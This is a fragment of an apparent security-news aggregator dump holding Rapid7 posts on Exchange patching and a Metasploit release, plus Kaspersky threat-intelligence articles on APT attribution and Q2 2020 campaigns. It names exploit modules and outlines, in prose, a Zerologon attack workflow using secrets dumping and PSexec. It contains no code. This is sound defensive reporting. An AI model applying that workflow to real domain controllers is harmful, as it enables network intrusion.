process for keeping the software up-to-date. They should also verify this is being done and hold the vendor accountable if not.\n * Leverage [vulnerability management tools](<https://www.rapid7.com/products/insightvm/>) and other types of tools to detect when Exchange environments are missing updates. 
They will be particularly helpful when Exchange version numbers cannot be reliably determined.\n\n### Upgrading considerations\n\nUpgrading an Exchange environment is a very complex task that is compounded by the server and client dependencies. This is why planning in advance is critical. Here are some examples of issues organizations may run into when planning an upgrade:\n\n * **Upgrading from Exchange 2010:** There is no direct upgrade path from Exchange 2010 to Exchange 2019. Organizations will need to upgrade to Exchange 2013 or 2016 first.\n * **Active Directory (AD) server OS:** Exchange 2019 doesn't support Windows Server 2012 AD servers and requires the AD forest functional level to be at least 2012 R2.\n * **TLS:** Exchange 2019, by default, requires TLS 1.2. This means that clients will need to support TLS 1.2, or other workarounds will need to be implemented in order to support legacy clients.\n * **Outlook compatibility:** Exchange 2019 requires at least Outlook 2013 with the most recent updates. 
Keep in mind that Outlook 2013 goes EoS April 11, 2023, so those leveraging it should upgrade to Outlook 2016 or higher.\n * **Unified Messaging (UM):** UM was removed in Exchange 2019\n * **Web browser compatibility:** Exchange 2019 doesn't support Internet Explorer 10 or lower.", "modified": "2020-09-29T16:05:16", "published": "2020-09-29T16:05:16", "id": "RAPID7BLOG:EAEC3BF3C403DB1C2765FD14F0E03A85", "href": "https://blog.rapid7.com/2020/09/29/microsoft-exchange-2010-end-of-support-and-overall-patching-study/", "type": "rapid7blog", "title": "Microsoft Exchange 2010 End of Support and Overall Patching Study", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-09T20:40:17", "bulletinFamily": "info", "cvelist": ["CVE-2018-2393", "CVE-2020-0688", "CVE-2020-1472"], "description": "## SAP Internet Graphics Server (IGS)\n\n\n\nThis week includes a new module targeting the SAP Internet Graphics Server application, contributed by community member [Vladimir Ivanov](<https://github.com/Vladimir-Ivanov-Git>). This particular module covers two CVEs that are both XML External Entity (XXE) bugs that are remotely exploitable. The module comes fully featured with the ability to check for the presence of the vulnerabilities as well as two methods to leverage them. The first is a read action that allows users to read files from the remote server, while the second can be used to trigger a denial of service (DoS) condition.\n\n## Just read the (new Zerologon) docs\n\nThe module documentation for the Zerologon ([CVE-2020-1472](<https://attackerkb.com/topics/7FbcgDOidQ/cve-2020-1472-aka-zerologon?referrer=wrapup>)) module has been updated with details of how to run the entire attack workflow through Metasploit. 
This specifically included leveraging the new `auxiliary/gather/windows_secrets_dump` which can recover the machine password to restore on the targeted Domain Controller and using the PSexec module to execute a payload. It\u2019s important to restore the machine account password to prevent services from breaking. Module documentation can be accessed from msfconsole by using the `info -d` command. The most recent Metasploit Demo meeting also covered this content, [showing](<https://www.youtube.com/watch?v=Z5oQmHVsqjA&t=1648>) the newly documented workflow in action.\n\n## New modules (1)\n\n * [SAP Internet Graphics Server (IGS) XMLCHART XXE](<https://github.com/rapid7/metasploit-framework/pull/14163>) by Vladimir Ivanov and Yvan Genuer, which exploits [CVE-2018-2393](<https://attackerkb.com/topics/EmAs1SnpOK/cve-2018-2393?referrer=wrapup>)\n\n## Enhancements and features\n\n * [Update sap_service_discovery.rb to support discovering SAP IGS servers](<https://github.com/rapid7/metasploit-framework/pull/14238>) by Vladimir Ivanov\n * [Tab-completion improved for module OPTIONS not available](<https://github.com/rapid7/metasploit-framework/pull/14070>) by mariabelenTC\n * [Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates](<https://github.com/rapid7/metasploit-framework/pull/14213>) by Alan David Foster\n * [Add the DOMAIN option to the CVE-2020-0688 Exploit](<https://github.com/rapid7/metasploit-framework/pull/14190>) by Spencer McIntyre\n * [Update the module docs for CVE-2020-1472 (Zerologon)](<https://github.com/rapid7/metasploit-framework/pull/14204>) by Spencer McIntyre\n\n## Bugs fixed\n\n * [Fix msf6 TLV_TYPE_PIVOT_STAGE_DATA_SIZE pivoting error](<https://github.com/rapid7/metasploit-framework/pull/14028>) by Alan David Foster\n * [Always show module actions within the info command](<https://github.com/rapid7/metasploit-framework/pull/14233>) by Alan David Foster\n * [Remove modules whose deprecation date has 
passed](<https://github.com/rapid7/metasploit-framework/pull/14242>) by Spencer McIntyre\n * [Convert myworkspace.id to myworkspace_id for no db compat](<https://github.com/rapid7/metasploit-framework/pull/14226>) by h00die\n * [Disconnect the named pipe and break after the impersonation callback](<https://github.com/rapid7/metasploit-payloads/pull/438>) by Spencer McIntyre\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.9...6.0.10](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-10-01T17%3A52%3A23%2B01%3A00..2020-10-08T11%3A41%3A44-05%3A00%22>)\n * [Full diff 6.0.9...6.0.10](<https://github.com/rapid7/metasploit-framework/compare/6.0.9...6.0.10>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2020-10-09T19:41:47", "published": "2020-10-09T19:41:47", "id": "RAPID7BLOG:0C3EDBDC537092A20C850F762D5A5856", "href": "https://blog.rapid7.com/2020/10/09/metasploit-wrap-up-82/", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2020-08-07T08:03:43", "bulletinFamily": "blog", "cvelist": ["CVE-2020-0688"], "description": "\n\nOn June 17, we hosted our first "GReAT Ideas. 
Powered by SAS" session, in which several experts from our Global Research and Analysis Team shared insights into APTs and threat actors, attribution, and hunting IoT threats.\n\nHere is a brief summary of the agenda from that webinar:\n\n * Linking attacks to threat actors: case studies by Kurt Baumgartner\n * Threat hunting with Kaspersky's new malware attribution engine by Costin Raiu\n * Microcin-2020: GitLab programmers ban, async sockets and the sock by Denis Legezo\n * The next generation IoT honeypots by Dan Demeter, Marco Preuss, and Yaroslav Shmelev\n\nSadly, the two hours of the session were not enough to answer all of the questions raised, so we try to answer them below. Thanks to everyone who participated, and we appreciate all the feedback and ideas!\n\n## Questions about threat actors and APTs\n\n 1. _How do you see Stonedrill deployment comparing now? Its discovery was based on lucky structural similarities with Shamoon, but do you see it actively used or correlating to the spread of this malware?_\n\nThere is some 2020 activity that looks like it could be Stonedrill related, but, in all likelihood, it is not. We are digging through details and trying to make sense of the data. Regardless, wiper activity in the Middle East region from late 2019 into early 2020 deployed code dissimilar to Stonedrill but more similar to Shamoon wipers. We stuck with the name "Dustman" \u2013 it implemented the Eldos ElRawDsk drivers. Its spread did not seem Stonedrill related.\n\nAt the same time, no, the Stonedrill discovery was not based on luck. And, there are multiple overlaps between Shamoon 2.0 and Stonedrill that you may review under "Download full report" in '[From Shamoon to StoneDrill](<https://securelist.com/from-shamoon-to-stonedrill/77725/>)' blogpost. 
You might note that Stonedrill is a somewhat more refined and complex code, used minimally.\n\nWhile the Shamoon spreader shared equivalent code with Orangeworm's Kwampirs spreader, and are closely linked, we have not seen the same level of similarity with Stonedrill. However, several of the Shamoon 2.0 executables share quite a few unique genotypes with both Stonedrill and Kwampirs. In the above paper, we conclude that Stonedrill and Shamoon are most likely spread by two separate groups with aligned interests for reasons explained in the report PDF. Also, it may be that some of the codebase, or some of the resources providing the malware, are shared.\n 2. _Do the authors of Shamoon watch these talks?_\n\nPerhaps. We know that not only do offensive actors and criminals attempt to reverse-engineer and evade our technologies, but they attempt to attack and manipulate them over time. Attending a talk or downloading a video later is probably of interest to any group.\n 3. _Are there any hacker-for-hire groups that are at the top level? How many hacker-for-hire groups do you see? Are there any hacker-for-hire groups coming out of the West?_\n\nYes. There are very capable and experienced hack-for-hire groups that have operated for years. We do not publicly report on all of them, but some come up in the news every now and then. At the beginning of 2019, Reuters reported insightful content on a top-level mercenary group and their Project Raven in the Middle East, for example. Their coordination, technical sophistication and agile capabilities were all advanced. In addition to the reported challenges facing the Project Raven group, some of these mercenaries may be made up of a real global mix of resources, presenting moral and ethical challenges.\n 4. _I assume Sofacy watches these presentations. Has their resistance to this analysis changed over time?_\n\nAgain, perhaps they do watch. 
In all likelihood, what we call "Sofacy" is paying attention to our research and reporting like all the other players.\n\nSofacy is an interesting case as far as their resistance to analysis: their main backdoor, SPLM/CHOPSTICK/X-Agent, was modular and changed a bit over the course of several years, but much of that code remained the same. Every executable they pushed included a modified custom encryption algorithm to hide away configuration data if it was collected. So, they were selectively resistant to analysis. Other malware of theirs, X-Tunnel, was re-coded in .Net, but fundamentally, it is the same malware. They rotated through other malware that seems to have been phased out and may be re-used at some point.\n\nThey are a prolific and highly active APT. They added completely new downloaders and other new malware to their set. They put large efforts into non-executable-based efforts like various credential harvesting techniques. So, they have always been somewhat resistant to analysis, but frequently leave hints in infrastructure and code across all those efforts.\n\nZebrocy, a subset of Sofacy, pushed malware with frequent changes by recoding their malware in multiple languages, but often maintain similar or the same functionality over the course of releases and re-releases. This redevelopment in new and often uncommon languages can be an issue, but something familiar will give it away.\n 5. _Have we seen a trend for target countries to pick up and use tools/zero-days/techniques from their aggressors? 
Like, is Iran more likely to use Israeli code, and vice versa?_\n\nFor the most part, no, we don't see groups repurposing code potentially only known to their adversary and firing it right back at them, likely because the adversary knows how to, and probably is going to watch for blowback.\n\nTangentially, code reuse isn't really a trend, because offensive groups have always picked up code and techniques from their adversaries, whether or not these are financially motivated cybercriminal groups or APT. And while we have mentioned groups "returning fire" in the past, like Hellsing [returning spear-phish](<https://securelist.com/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/69567/>) on the Naikon APT, a better example of code appropriation is VictorianSambuca or Bemstour. We talked about it at our T3 gathering in Cancun in October. It was malware containing an interesting zero-day exploit that was collected, re-purposed, touched up and re-deployed by APT3, HoneyMyte and others. But as far as we know, the VictorianSambuca package was picked up and used against targets other than its creator.\n\nAlso, somewhere in the Darkhotel/Lazarus malware sets, there may be some code blowback, but those details haven't yet been hammered out. So, it does happen here and there, maybe out of necessity, maybe to leave a calling card and shout-out, or to confuse matters.\n 6. _If using API-style programming makes it easier to update malware, why don't more threat actors use it?_\n\nI think here we are talking about Microcin last-stage trojan exported function callbacks. Nobody could tell for sure, but from my point of view, it's a matter of the programmer's experience. The "senior" one takes a lot into consideration during development, including architectural approach, which could make maintenance easier in the future.\n\nThe "junior" one just solves the trojan's main tasks: spying capabilities, adds some anti-detection, anti-analysis tricks, and it's done. 
So maybe if the author has "normal" programming experience, he carefully planned data structures, software architecture. Seems like not all of the actors have developers like that.\n 7. _Have you seen proxying/tunneling implants using IOTs for APT operations, such as the use of SNMP by CloudAtlas? Do you think that's a new way to penetrate company networks? Have you ever encountered such cases?_\n\nWe watched the massive Mirai botnets for a couple years, waiting to see an APT takeover or repurposing, and we didn't find evidence that it happened. Aside from that, yes, APT are known to have tunneled through a variety of IOT to reach their intended targets. IOT devices like security web cams and their associated network requirements need to be hardened and reviewed, as their network connections may lead to an unintended exposure of internal resources.\n\nWith elections around the world going on, municipalities and government agencies contracting with IT companies need to verify attack surface hardening and understand that everything, from their Internet-connected parking meters to connected light bulbs, can be part of a targeted attack, or be misused as a part of an incident.\n 8. _How often do you see steganography like this being used by other actors? Any other examples?_\n\nSteganography isn't used exclusively by the SixLittleMonkeys actor for sure. We could also mention here such malware as NetTraveller, Triton, Shamoon, Enfal, etc. So, generally, we could say the percentage of steganography usage among all the malicious samples is quite low, but it happens from time to time.\n\nThe main reason to use it from malefactors' point of view is to conceal not just the data itself but the fact that data is being uploaded or downloaded. E.g. it could help to bypass deep packet inspection (DPI) systems, which is relevant for corporate security perimeters. 
Use of steganography may also help bypass security checks by anti-APT products, if the latter cannot process all image files.\n\n## Questions about KTAE (Kaspersky Threat Attribution Engine)\n\nFor more information, please also have a look at our previous blogpost, [Looking at Big Threats Using Code Similarity. Part 1](<https://securelist.com/big-threats-using-code-similarity-part-1/97239/>), as well as at our [product page](<https://www.kaspersky.com/enterprise-security/cyber-attack-attribution-tool>).\n\n 9. _What are "genotypes"?_ \nGenotypes are unique fragments of code, extracted from a malware sample.\n 10. _How fine-grained do you attribute the binaries? Can you see shared authors among the samples?_ \nKTAE does not include author information per se. You can see shared relevant code and string overlaps.\n 11. _Are genotypes and YARA rules connected?_ \nNot directly. But you can use genotypes to create effective YARA rules, since the YARA engine allows you to search for byte sequences.\n 12. _How many efforts do you see for groups to STEAL+REUSE attribution traces on purpose?_ \nWe have seen such efforts and reported on them, for example with [OlympicDestroyer](<https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/>).\n 13. _How do you go about removing third-party code sharing?_ \nWe incorporated our own intelligence to only match on relevant parts of the samples.\n 14. _Do genotypes work on different architectures, like MIPS, ARM, etc.? I'm thinking about IoT malware._ \nYes, they work with any architecture.\n 15. _What determines your "groundtruth"?_ \nGroundtruth is a collection of samples based on our 20+ years of research and classification of malware.\n 16. _Can KTAE be implemented in-house?_ \nWe offer multiple options for deploying KTAE. Please get in touch with us for more info: https://www.kaspersky.com/enterprise-security/cyber-attack-attribution-tool.\n 17. 
_For the attribution engine, would you expect APT-group malware authors to start integrating more external code chunks from other groups to try to evade attribution?_ \nWe see such behavior; please refer to Question 12 above.\n 18. _Do you feel more manufacturers will follow Kaspersky's suit in letting victims know the threat actors behind malware detections on endpoints?_ \nAt the moment, KTAE is a standalone solution not integrated in endpoints.\n 19. _What is the parameter for looking at the similarity in malware code? Strings? Packer? Code? What else?_ \nKTAE uses genotypes to match similarities.\n 20. _How do I make a difference, if for example, I am a threat actor and reuse the code from some APT Group? How to define it is really the same actor and not just an impersonator who used the same code or malware, or reused the malware for my operation?_ \nKTAE handles code similarities for malware samples to provide relevant information on that basis. Further information to be used for attribution may be TTPs, etc. for which you may find our [Kaspersky Threat Intelligence Services](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) helpful.\n 21. _I guess the follow-up is, will they be able to evade the attribution after watching these webinars, learning about the attribution engine?_ \nIt's known that such techniques can be used to do technical attribution on a malware-sample basis. Attempts at evading these would mean knowing all the details and metrics and database entries (including updates) to check against something rather complex and difficult.\n 22. _Can you start taking the samples submitted by CYBERCOM and just post publicly what KTAE says in the future?_ \nWe are posting certain interesting findings, e.g. on Twitter.\n 23. _How do we buy KTAE? Is it a private instance in our own org or hosted by you?_ \nWe offer multiple options for deploying KTAE. 
Please get in touch with us for more info: https://www.kaspersky.com/enterprise-security/cyber-attack-attribution-tool.\n 24. _Can you expand on how you identify a genotype and determine that it is unique?_ \nGenotypes are unique fragments of code, extracted from a malware sample. As for uniqueness, there is a good reference: the Fruit Ninja Game. We played Fruit Ninja and extracted (sliced) genotypes from all good programs that are known to us, then we did the same with malicious samples and samples marked as APTs. After that operation, we knew all genotypes that belonged to good programs and removed them from the databases that belonged to bad ones. We also save the numbers of times genotypes appear in the samples, so we can identify the really unique stuff.\n 25. _How many zero-day vendors do you see with this engine?_ \nKTAE is not handling vulnerabilities but only code fragments and such, for similarity checks.\n 26. _In the future, do you see a product like KTAE being integrated into security offerings from Kaspersky, so that samples can be automatically scanned when detected as an alert, as opposed to individually uploading them?_ \nWe are planning to do cross-product integration.\n 27. _Have you run The Shadowbrokers samples through KTAE and if so, were there any unexpected overlaps?_ \nYes, we did. We found an overlap between Regin samples and cnli-1.dll\n 28. _Could it be easy for a threat actor to change code to avoid KTAE identification?_ \nTheoretically, yes. Assuming they produce never-before-seen genotypes, KTAE might miss classifying that malware. With that being said, generating completely new genotypes requires a lot of time and money, plus a lot of careful work. We wish threat actors good luck with that. \ud83d\ude42\n 29. 
_When you attribute a campaign, do you also consider some aspects relating to sociopolitical events?_ \nAt Kaspersky, we only do technical attribution, such as based on similarities in malware samples or TTPs of groups; we don't do attribution on any entity, geopolitical or social level.\n\n## Questions about IoT threats and honeypots\n\nIf you want to join our honeypot project, please get in touch with us at honeypots@kaspersky.com.\n\n 30. _Do you have any IoT dataset available for academia?_ \nPlease get in touch with us via our email address listed above (honeypots@kaspersky.com).\n 31. _How does a system choose which honeypots to direct an attack at?_ \nWe developed this modular and flexible infrastructure with defined policies to handle that automatically, based on the attack.\n 32. _Okay, so, soon, IoT malware will do a vmcheck before it loads\u2026. Then what?_ \nIn our honeypots, we use our own methods to defeat anti-VM checks. Depending on future development of malware, we are also prepared to adjust these to match actual vmcheck methods.\n 33. _Do the honeypots support threat intelligence formats like STIX and TAXII?_ \nCurrently, such a feature is not available yet. If there is interest, we can implement this to improve the use for our partners.\n 34. _Can anyone partner with you guys? Or do they need certain visibility or infrastructure to help out?_ \nAnyone with a spare IP-address and able to host a Linux system to receive attacks can participate. Please get in touch with us at honeypots[at]kaspersky[dot]com.\n\n## Questions about Kaspersky products and services\n\n 35. _What new technology has Kaspersky implemented in their endpoint product? As EDR is the latest emerging technology, has Kaspersky implemented it in their endpoint product?_ \nKaspersky Endpoint product contains EDR besides other cutting-edge technologies. There are more details listed here on [the product page](<https://www.kaspersky.com/enterprise-security/endpoint-product>).\n 36. 
_What do you think of the Microsoft Exchange Memory Corruption Vulnerability bug? How can Kaspersky save the host system in such attacks?_ \nWe should know the CVE number of the bug the question refers to. From what we know, one of the "loud" bugs that was fixed recently was CVE-2020-0688. It is referenced [here](<https://support.microsoft.com/en-us/help/4536987/security-update-for-exchange-server-2019-and-2016>). We detect this vulnerability in our products using the Behavior Detection component with the verdict name: PDM:Exploit.Win32.Generic. Also, Kaspersky products have vulnerability scanners that notify you about vulnerabilities in installed software, and we also [provide](<https://www.kaspersky.com/small-to-medium-business-security/downloads/systems-management>) a patch management solution for business environments that helps system administrators handle software updates for all computers and servers on the corporate network.\n 37. _How can a private DNS protect the Host System from attacks?_ \nWhile DNS is a key component of the Internet, disrupting DNS queries can impact a large portion of Internet users. We know for sure the people running DNS Root servers are professionals and know their job really well, so we are not worried that much about Root servers being disrupted. Unfortunately, attackers sometimes focus on specific DNS resolvers and manage to disrupt large portions of the Internet, as in the [2016 DDoS against the Dyn DNS resolver](<https://en.wikipedia.org/wiki/2016_Dyn_cyberattack>). Although it is limited in its use, a private DNS system can protect against large DDoS attacks, because it will be private and may be harder to reach by the attackers.\n\n## Advanced questions raised\n\nWe are not afraid of tough questions; therefore, we did not filter out the following ones.\n\n 38. _Where can we get one of those shirts Costin is wearing?_ \nWe are about to launch a GReAT merchandise shop soon \u2013 stay tuned.\n 39. 
_Who cut Jeff's hair?_ \nEdward Scissorhands. He's a real artist. Can recommend.\n 40. _Did Costin get a share from the outfits found in the green Lambert's house when it got raided?_ \nWe can neither confirm nor deny.\n 41. _Who is a better football team, Steelers or Ravens?_ \nFootball? Is that the game where they throw frisbees?\n\nWe hope you find these answers useful. The next series of the GReAT Ideas. Powered by SAS webinars, where we will share more of our insights and research, will take place on July 22. You can register for the event here: <https://kas.pr/gi-sec>\n\nAs we promised, some of the best questions asked during the webinar will be awarded with a prize from the GReAT Team. The winning questions are: \n"Are there any hacker for hire groups that are at the very top level? How many hackers-for-hire groups do you see? Are there any hacker for hire groups coming out of the west?" \n"Can you expand on how you identify a genotype and determine that it is unique?"\n\nWe will contact those who submitted these questions shortly.\n\nFeel free to follow us on Twitter and other social networks for updates, and feel free to reach out to us to discuss interesting topics.\n\nOn Twitter:\n\n * Costin Raiu: @craiu\n * Kurt Baumgartner: @k_sec\n * Denis Legezo: @legezo\n * Dan Demeter: @_xdanx\n * Marco Preuss: @marco_preuss\n * Yury Namestnikov: @SomeGoodOmens", "modified": "2020-07-15T10:00:13", "published": "2020-07-15T10:00:13", "id": "SECURELIST:F05591B26EFD622E6C72E180A7A47154", "href": "https://securelist.com/great-ideas-follow-up/97816/", "type": "securelist", "title": "GReAT Ideas follow-up", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-08-07T08:03:43", "bulletinFamily": "blog", "cvelist": ["CVE-2008-3431", "CVE-2019-10149", "CVE-2020-0688"], "description": "\n\nFor more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat 
(APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q2 2020.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact '[intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)'.\n\n## **The most remarkable findings**\n\nOn May 11, the UK-based supercomputing center, ARCHER, announced that it would shut down access to its network while it investigated a security incident. The website stated that the "ARCHER facility is based around a Cray XC30 supercomputer (with 4920 nodes) that provides the central computational resource". At the same time, the German-based bwHPC also announced a security incident and decided to restrict access to its resources. The Swiss National Supercomputing Centre, at the time involved in a project to study the small membrane protein of the coronavirus, confirmed that it, and other European high-performance computer facilities, had been attacked and that it had temporarily closed. On May 15, the EGI Computer Security and Incident Response Team (EGI-CSIRT) published an alert covering two incidents that, according to its report, may or may not be related. Both incidents describe the targeting of academic data centers for "CPU mining purposes". The alert includes a number of IoCs, which complement other OSINT (open-source intelligence) observations. Although we weren't able to establish with a high degree of certitude that the ARCHER hack and the incidents described by EGI-CSIRT are related, we suspect they might be. 
Some media speculated that all these attacks might be related to COVID-19 research being carried out at the supercomputing centers.\n\nInterestingly, on July 16, 2020, NCSC [published](<https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf>) an advisory describing malicious activity targeting institutions related to research to find a vaccine for COVID-19. In this case, the malware used in the attacks belongs to a family called WellMess, as [originally described](<https://www.lac.co.jp/lacwatch/pdf/20180614_cecreport_vol3.pdf>) by LAC Co back in 2018. Until recently, this malware was not believed to be related to any APT activity. Surprisingly, NCSC attributes this activity to the APT-29 threat actor. However, it does not provide any public proof.\n\nFrom our own research, we can confirm that WellMess's activity seems to follow a cycle, being used in campaigns every three months or so since its discovery. We observed a peak of activity in fall of 2019, followed by an increase in the number of C2s in February 2020. We also observed high-profile targeting, including telcos, government and contractors in MENA and the EU. However, from our side we cannot confirm attribution or targeting of health institutions at the moment.\n\nFor more details about WellMess, you can check our presentation from GReAT ideas here: <https://youtu.be/xeTYLRCwnFo>\n\n## **Russian-speaking activity**\n\nIn May, researchers at Leonardo published a report about "Penquin_x64", a previously undocumented variant of Turla's Penquin GNU/Linux backdoor. Kaspersky has publicly documented the Penquin family, tracing it back to its Unix ancestors in the Moonlight Maze operation of the 1990s. We followed up on this latest research by generating network probes that detect Penquin_x64 infected hosts at scale, allowing us to discover that tens of internet hosters' servers in Europe and the US are still compromised today. 
We think it's possible that, following public disclosure of Turla's GNU/Linux tools, the Turla threat actor may have been repurposing Penquin to conduct operations other than traditional intelligence.\n\nIn June, we discovered two different domain names, "emro-who[.]in" and "emro-who[.]org", typo-squatting the World Health Organization (WHO) Regional Office for the Eastern Mediterranean (EMRO). These domains, registered on June 21 using the Njalla.no registrar, seem to be used as sender domains for a spear-phishing campaign. This type of typo-squatting is reminiscent of Sofacy campaigns against other international organizations. Moreover, we have seen Njalla.no recently used to register SPLM and XTUNNEL C2 (command-and-control) servers and we have seen this autonomous system used by Sofacy in the past for a SPLM C2.\n\nHades is an elusive, highly dynamic threat actor that commonly engages in tailored hacking and special access operations, such as the [OlympicDestroyer](<https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/>) attack or the [ExPetr](<https://securelist.com/schroedingers-petya/78870/>) (aka NotPetya) and Badrabbit attacks. On May 28, the US National Security Agency (NSA) [published an alert](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2196511/exim-mail-transfer-agent-actively-exploited-by-russian-gru-cyber-actors/>) detailing the use by Hades of an Exim vulnerability (CVE-2019-10149) for what appears to be a potentially large hacking operation designed for mass access. Our own report expanded on the scripts used in this operation, as well as providing other IoCs that we discovered.\n\n## **Chinese-speaking activity**\n\nIn late 2019, and again in March this year, we described ongoing malicious activities from a previously unknown threat actor that we named [Holy Water](<https://securelist.com/holy-water-ongoing-targeted-water-holing-attack-in-asia/96311/>). 
Holy Water notably leveraged a Go language and Google Drive-command-driven implant that we dubbed Godlike12. Following the publication of our report, and notifications to relevant incident response organizations, new Holy Water samples were submitted to VirusTotal. The newly discovered samples include Telegram-controlled and open-source-based Python implants that were probably deployed on the victim's networks after a successful intrusion.\n\nIn March, one of our YARA rules from previous research on ShadowPad attacks detected a recently compiled executable file uploaded to VirusTotal. Later we found a few other samples from our own telemetry. ShadowPad is a modular attack platform consisting of a root module and various plugin modules responsible for diverse functionalities. ShadowPad was first discovered by Kaspersky in 2017. In August of that year, one of our customers detected suspicious network activities. After thorough investigation, we found a legitimate software module that had been compromised and backdoored by an advanced threat actor in a sophisticated software supply-chain attack. We notified the software vendor and also [published the outcome of our investigations in a technical white paper](<https://securelist.com/shadowpad-in-corporate-networks/81432/>). Since then, ShadowPad malware has been deployed in a number of major cyberattacks, with a different subset of plugins used in different attack cases: the CCleaner incident in 2017 and the [ShadowHammer](<https://securelist.com/operation-shadowhammer/89992/>) attacks in 2018 are the major examples of such attacks.\n\nWhen analyzing new samples from ShadowPad malware, compiled and used in attacks since late 2019, our investigation revealed a strong connection between these recent ShadowPad malware samples and the CactusPete threat actor. CactusPete started deploying ShadowPad malware to a few victims at the beginning of 2019 through its HighProof backdoor. 
However, since late 2019, ShadowPad has been commonly used in CactusPete attacks.\n\nThis quarter, we described another CactusPete attack campaign which started in December 2019. In this campaign, the CactusPete threat actor used a new method to drop an updated version of the DoubleT backdoor onto the computers. The attackers implanted a new dropper module in the Microsoft Word Startup directory, most likely through a malicious document. This malicious dropper is responsible for dropping and executing a new version of the DoubleT backdoor, which utilizes a new method of encrypting the C2 server address.\n\nWhile analysing compromised machines in Central Asia, we revealed an additional infection that was unrelated to the initial subject of our investigation. This led us to detect previously unknown malware that we dubbed B&W, which provides an attacker with the capabilities to remotely control a victim's machine. Further analysis of the samples, infrastructure and other related artefacts allowed us to conclude, with medium confidence, that the newly found malware is related to the SixLittleMonkeys APT. This group is known to have been active for several years, targeting government entities in Central Asia.\n\nHoneyMyte is an APT threat actor that we have been tracking for several years. In February, our fellow researchers at Avira blogged about HoneyMyte PlugX variants that they had recently observed targeting Hong Kong. PlugX has been used by multiple APT groups over the past decade, especially shared among Chinese-speaking threat actors, and has changed in many ways. Avira's post covers the PlugX loader and backdoor payload, including its USB capabilities. In May, we published an update on this threat actor, specifically providing timely indicators to aid in threat hunting for some of the PlugX variants found in the wild between January and May this year.\n\nIn May, we discovered a watering hole on the website of a Southeast Asian top official. 
This watering hole, set up in March, seemed to leverage whitelisting and social engineering techniques to infect its targets. The final payload was a simple ZIP archive containing a readme file prompting the victim to execute a CobaltStrike implant. The mechanism used to execute CobaltStrike was DLL side-loading, which decrypted and executed a CobaltStrike stager shellcode. Analysis of the code, the infrastructure and the victimology led us to attribute this watering-hole, with high confidence, to the HoneyMyte APT threat actor.\n\nQuarian is a little-known malicious program that Chinese-speaking actors have used since around 2012. We hadn't spotted any further activity until we observed a resurgence in an attack by the Icefog group in 2019. We tracked the activity of the malware following this and noticed a new variant that was used during several attacks on Middle Eastern and African governments during 2020. In one case, we could see that this variant was deployed following exploitation of the CVE-2020-0688 vulnerability on the network of a government entity. This vulnerability, which was publicly reported in February 2020, allows an authenticated user to run commands as SYSTEM on a Microsoft Exchange server. In this case, the server was indeed compromised and was hosting the ChinaChopper webshell, which was used to obtain, and later launch, the Quarian and PlugX backdoors. Our analysis led us to assume, with medium to high confidence, that the group behind these attacks is one we track under the name CloudComputating - a Chinese-speaking actor that, based on previous reports, has targeted high-profile Middle Eastern diplomatic targets.\n\nIn March, researchers at Check Point Research published a [report](<https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/>) describing an APT campaign that targeted Mongolia's public sector and leveraged a coronavirus-themed lure to conduct its initial intrusion. 
We were able to discover further samples and another COVID-themed document with the same targeting, as well as additional targets in Russia. We attribute this activity with medium confidence to IronHusky.\n\n## **Middle East**\n\nThe MuddyWater APT was discovered in 2017 and has been active in the Middle East ever since. In 2019, we reported activity against telecoms providers in Iraq and Iran, as well as government bodies in Lebanon. We recently discovered MuddyWater using a new C++ toolchain in a new wave of attacks in which the actor leveraged an open-source utility called Secure Socket Funneling for lateral movement.\n\nAt the end of May, we observed that Oilrig had included the DNSExfiltrator tool in its toolset. It allows the threat actor to use the DNS over HTTPS (DoH) protocol. Use of the DNS protocol for malware communications is a technique that Oilrig has been using for a long time. The difference between DNS- and DoH-based requests is that, instead of plain text requests to port 53, they would use port 443 in encrypted packets. Oilrig added the publicly available DNSExfiltrator tool to its arsenal, which allows DoH queries to Google and Cloudflare services. This time, the operators decided to use subdomains of a COVID-related domain which are hardcoded in the DNSExfiltrator detected samples.\n\n## **Southeast Asia and Korean Peninsula**\n\nBlueNoroff is one of the most prolific financially motivated APT actors and we have published several reports of BlueNoroff campaigns targeting financial institutions. Recently, we uncovered another campaign that has been active since at least 2017. In this campaign, the group sends spear-phishing emails containing an archived Windows shortcut file. The file names are disguised as security or cryptocurrency related files in order to entice users into executing them. The infection chain started from this shortcut file is a complex multi-stage infection procedure. 
